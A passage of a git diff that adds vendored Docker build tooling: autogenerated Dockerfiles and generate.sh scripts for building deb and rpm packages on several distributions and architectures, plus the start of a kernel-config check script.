+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
new file mode 100644
index 0000000000..f1521db72f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
+#
+
+FROM ppc64le/ubuntu:xenial
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
new file mode 100644
index 0000000000..4f8cc66769
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
+#
+
+FROM ppc64le/ubuntu:yakkety
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
new file mode 100755
index 0000000000..8271d9dc47
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+set -x
+./generate.sh
+for d in */; do
+	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
new file mode 100755
index 0000000000..b8f5860844
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh
@@ -0,0 +1,96 @@
+#!/bin/bash
+set -e
+
+# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
+#
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh ubuntu-xenial
+#        to only update ubuntu-xenial/Dockerfile
+#    or: ./generate.sh ubuntu-newversion
+#        to create a new folder and a Dockerfile within it
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	echo "${versions[@]}"
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="s390x/${distro}:${suite}"
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"!
+		#
+
+		FROM $from
+
+	EOF
+
+	extraBuildTags='pkcs11'
+	runcBuildTags=
+
+	# this list is sorted alphabetically; please keep it that way
+	packages=(
+		apparmor # for apparmor_parser for testing the profile
+		bash-completion # for bash-completion debhelper integration
+		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
+		build-essential # "essential for building Debian packages"
+		cmake # tini dep
+		curl ca-certificates # for downloading Go
+		debhelper # for easy ".deb" building
+		dh-apparmor # for apparmor debhelper
+		dh-systemd # for systemd debhelper integration
+		git # for "git commit" info in "docker -v"
+		libapparmor-dev # for "sys/apparmor.h"
+		libdevmapper-dev # for "libdevmapper.h"
+		libltdl-dev # for pkcs11 "ltdl.h"
+		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
+		libsqlite3-dev # for "sqlite3.h"
+		pkg-config # for detecting things like libsystemd-journal dynamically
+		libsystemd-dev
+		vim-common # tini dep
+	)
+
+	case "$suite" in
+		# s390x needs libseccomp 2.3.1
+		xenial)
+			# Ubuntu Xenial has libseccomp 2.2.3
+			runcBuildTags="apparmor selinux"
+			;;
+		*)
+			extraBuildTags+=' seccomp'
+			runcBuildTags="apparmor selinux seccomp"
+			;;
+	esac
+
+	# update and install packages
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
+	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+
+	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
new file mode 100644
index 0000000000..6d7e4c574b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"!
+#
+
+FROM s390x/ubuntu:xenial
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
new file mode 100644
index 0000000000..5f2e888c7a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
@@ -0,0 +1,5 @@
+# `dockercore/builder-rpm`
+
+This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets.
+
+To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file.
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
new file mode 100755
index 0000000000..558f7ee0db
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+set -x
+./generate.sh
+for d in */; do
+	docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
new file mode 100644
index 0000000000..1f841631ca
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
@@ -0,0 +1,19 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM centos:7
+
+RUN yum groupinstall -y "Development Tools"
+RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs
+RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS seccomp selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
new file mode 100644
index 0000000000..af040c5c9f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
@@ -0,0 +1,19 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM fedora:24
+
+RUN dnf -y upgrade
+RUN dnf install -y @development-tools fedora-packager
+RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS seccomp selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
new file mode 100644
index 0000000000..98e57a9c4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
@@ -0,0 +1,19 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM fedora:25
+
+RUN dnf -y upgrade
+RUN dnf install -y @development-tools fedora-packager
+RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS seccomp selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
new file mode 100755
index 0000000000..6f93afafa3
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
@@ -0,0 +1,189 @@
+#!/bin/bash
+set -e
+
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh centos-7
+#        to only update centos-7/Dockerfile
+#    or: ./generate.sh fedora-newversion
+#        to create a new folder and a Dockerfile within it
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="${distro}:${suite}"
+	installer=yum
+
+	if [[ "$distro" == "fedora" ]]; then
+		installer=dnf
+	fi
+	if [[ "$distro" == "photon" ]]; then
+		installer=tdnf
+	fi
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+		#
+
+		FROM $from
+	EOF
+
+	echo >> "$version/Dockerfile"
+
+	extraBuildTags='pkcs11'
+	runcBuildTags=
+
+	case "$from" in
+		oraclelinux:6)
+			# We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version
+			# This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo
+			echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4"  >> "$version/Dockerfile"
+			echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek"  >> "$version/Dockerfile"
+			echo >> "$version/Dockerfile"
+			;;
+		fedora:*)
+			echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile"
+			;;
+		*) ;;
+	esac
+
+	case "$from" in
+		centos:*)
+			# get "Development Tools" packages dependencies
+			echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile"
+
+			if [[ "$version" == "centos-7" ]]; then
+				echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile"
+			fi
+			;;
+		oraclelinux:*)
+			# get "Development Tools" packages and dependencies
+			# we also need yum-utils for yum-config-manager to pull the latest repo file
+			echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile"
+			;;
+		opensuse:*)
+			# get rpm-build and curl packages and dependencies
+			echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile"
+			;;
+		photon:*)
+			echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile"
+			;;
+		*)
+			echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile"
+			;;
+	esac
+
+	packages=(
+		btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible)
+		device-mapper-devel # for "libdevmapper.h"
+		glibc-static
+		libseccomp-devel # for "seccomp.h" & "libseccomp.so"
+		libselinux-devel # for "libselinux.so"
+		libtool-ltdl-devel # for pkcs11 "ltdl.h"
+		pkgconfig # for the pkg-config command
+		selinux-policy
+		selinux-policy-devel
+		sqlite-devel # for "sqlite3.h"
+		systemd-devel # for "sd-journal.h" and libraries
+		tar # older versions of dev-tools do not have tar
+		git # required for containerd and runc clone
+		cmake # tini build
+		vim-common # tini build
+	)
+
+	case "$from" in
+		oraclelinux:7)
+			# Enable the optional repository
+			packages=( --enablerepo=ol7_optional_latest "${packages[*]}" )
+			;;
+	esac
+
+	case "$from" in
+		oraclelinux:6)
+			# doesn't use systemd, doesn't have a devel package for it
+			packages=( "${packages[@]/systemd-devel}" )
+			;;
+	esac
+
+	# opensuse & oraclelinx:6 do not have the right libseccomp libs
+	case "$from" in
+		opensuse:*|oraclelinux:6)
+			packages=( "${packages[@]/libseccomp-devel}" )
+			runcBuildTags="selinux"
+			;;
+		*)
+			extraBuildTags+=' seccomp'
+			runcBuildTags="seccomp selinux"
+			;;
+	esac
+
+	case "$from" in
+		opensuse:*)
+			packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" )
+			packages=( "${packages[@]/pkgconfig/pkg-config}" )
+			packages=( "${packages[@]/vim-common/vim}" )
+			if [[ "$from" == "opensuse:13."* ]]; then
+				packages+=( systemd-rpm-macros )
+			fi
+
+			# use zypper
+			echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile"
+			;;
+		photon:*)
+			packages=( "${packages[@]/pkgconfig/pkg-config}" )
+			echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile"
+			;;
+		*)
+			echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile"
+			;;
+	esac
+
+	echo >> "$version/Dockerfile"
+
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
+	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+
+	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	case "$from" in
+                oraclelinux:6)
+                        # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff.
+                        # The ordering is very important and should not be changed.
+                        echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \'  >> "$version/Dockerfile"
+                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \'  >> "$version/Dockerfile"
+                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \'  >> "$version/Dockerfile"
+                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \'  >> "$version/Dockerfile"
+                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \'  >> "$version/Dockerfile"
+                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include'  >> "$version/Dockerfile"
+                        echo >> "$version/Dockerfile"
+                        ;;
+                *) ;;
+        esac
+
+
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
new file mode 100644
index 0000000000..addd431508
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
@@ -0,0 +1,18 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM opensuse:13.2
+
+RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build
+RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static  libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 selinux
+ENV RUNC_BUILDTAGS selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
new file mode 100644
index 0000000000..c34d3046dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
@@ -0,0 +1,28 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM oraclelinux:6
+
+RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4
+RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek
+
+RUN yum groupinstall -y "Development Tools"
+RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static  libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel  tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 selinux
+ENV RUNC_BUILDTAGS selinux
+
+ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \
+                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \
+                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \
+                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \
+                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \
+                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
new file mode 100644
index 0000000000..378536b647
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
@@ -0,0 +1,18 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM oraclelinux:7
+
+RUN yum groupinstall -y "Development Tools"
+RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS seccomp selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
new file mode 100644
index 0000000000..b77d573d9f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
@@ -0,0 +1,18 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
+#
+
+FROM photon:1.0
+
+RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils
+RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS seccomp selinux
+
diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh
new file mode 100755
index 0000000000..d07e4ce368
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/check-config.sh
@@ -0,0 +1,354 @@
+#!/usr/bin/env bash
+set -e
+
+EXITCODE=0
+
+# bits of this were adapted from lxc-checkconfig
+# see also https://github.com/lxc/lxc/blob/lxc-1.0.2/src/lxc/lxc-checkconfig.in
+
+possibleConfigs=(
+	'/proc/config.gz'
+	"/boot/config-$(uname -r)"
+	"/usr/src/linux-$(uname -r)/.config"
+	'/usr/src/linux/.config'
+)
+
+if [ $# -gt 0 ]; then
+	CONFIG="$1"
+else
+	: ${CONFIG:="${possibleConfigs[0]}"}
+fi
+
+if ! command -v zgrep &> /dev/null; then
+	zgrep() {
+		zcat "$2" | grep "$1"
+	}
+fi
+
+kernelVersion="$(uname -r)"
+kernelMajor="${kernelVersion%%.*}"
+kernelMinor="${kernelVersion#$kernelMajor.}"
+kernelMinor="${kernelMinor%%.*}"
+
+is_set() {
+	zgrep "CONFIG_$1=[y|m]" "$CONFIG" > /dev/null
+}
+is_set_in_kernel() {
+	zgrep "CONFIG_$1=y" "$CONFIG" > /dev/null
+}
+is_set_as_module() {
+	zgrep "CONFIG_$1=m" "$CONFIG" > /dev/null
+}
+
+color() {
+	local codes=()
+	if [ "$1" = 'bold' ]; then
+		codes=( "${codes[@]}" '1' )
+		shift
+	fi
+	if [ "$#" -gt 0 ]; then
+		local code=
+		case "$1" in
+			# see https://en.wikipedia.org/wiki/ANSI_escape_code#Colors
+			black) code=30 ;;
+			red) code=31 ;;
+			green) code=32 ;;
+			yellow) code=33 ;;
+			blue) code=34 ;;
+			magenta) code=35 ;;
+			cyan) code=36 ;;
+			white) code=37 ;;
+		esac
+		if [ "$code" ]; then
+			codes=( "${codes[@]}" "$code" )
+		fi
+	fi
+	local IFS=';'
+	echo -en '\033['"${codes[*]}"'m'
+}
+wrap_color() {
+	text="$1"
+	shift
+	color "$@"
+	echo -n "$text"
+	color reset
+	echo
+}
+
+wrap_good() {
+	echo "$(wrap_color "$1" white): $(wrap_color "$2" green)"
+}
+wrap_bad() {
+	echo "$(wrap_color "$1" bold): $(wrap_color "$2" bold red)"
+}
+wrap_warning() {
+	wrap_color >&2 "$*" red
+}
+
+check_flag() {
+	if is_set_in_kernel "$1"; then
+		wrap_good "CONFIG_$1" 'enabled'
+	elif is_set_as_module "$1"; then
+		wrap_good "CONFIG_$1" 'enabled (as module)'
+	else
+		wrap_bad "CONFIG_$1" 'missing'
+		EXITCODE=1
+	fi
+}
+
+check_flags() {
+	for flag in "$@"; do
+		echo -n "- "; check_flag "$flag"
+	done
+}
+
+check_command() {
+	if command -v "$1" >/dev/null 2>&1; then
+		wrap_good "$1 command" 'available'
+	else
+		wrap_bad "$1 command" 'missing'
+		EXITCODE=1
+	fi
+}
+
+check_device() {
+	if [ -c "$1" ]; then
+		wrap_good "$1" 'present'
+	else
+		wrap_bad "$1" 'missing'
+		EXITCODE=1
+	fi
+}
+
+check_distro_userns() {
+	source /etc/os-release 2>/dev/null || /bin/true
+	if [[ "${ID}" =~ ^(centos|rhel)$ && "${VERSION_ID}" =~ ^7 ]]; then
+		# this is a CentOS7 or RHEL7 system
+		grep -q "user_namespace.enable=1" /proc/cmdline || {
+			# no user namespace support enabled
+			wrap_bad "  (RHEL7/CentOS7" "User namespaces disabled; add 'user_namespace.enable=1' to boot command line)"
+			EXITCODE=1
+		}
+	fi
+}
+
+if [ ! -e "$CONFIG" ]; then
+	wrap_warning "warning: $CONFIG does not exist, searching other paths for kernel config ..."
+	for tryConfig in "${possibleConfigs[@]}"; do
+		if [ -e "$tryConfig" ]; then
+			CONFIG="$tryConfig"
+			break
+		fi
+	done
+	if [ ! -e "$CONFIG" ]; then
+		wrap_warning "error: cannot find kernel config"
+		wrap_warning "  try running this script again, specifying the kernel config:"
+		wrap_warning "    CONFIG=/path/to/kernel/.config $0 or $0 /path/to/kernel/.config"
+		exit 1
+	fi
+fi
+
+wrap_color "info: reading kernel config from $CONFIG ..." white
+echo
+
+echo 'Generally Necessary:'
+
+echo -n '- '
+cgroupSubsystemDir="$(awk '/[, ](cpu|cpuacct|cpuset|devices|freezer|memory)[, ]/ && $3 == "cgroup" { print $2 }' /proc/mounts | head -n1)"
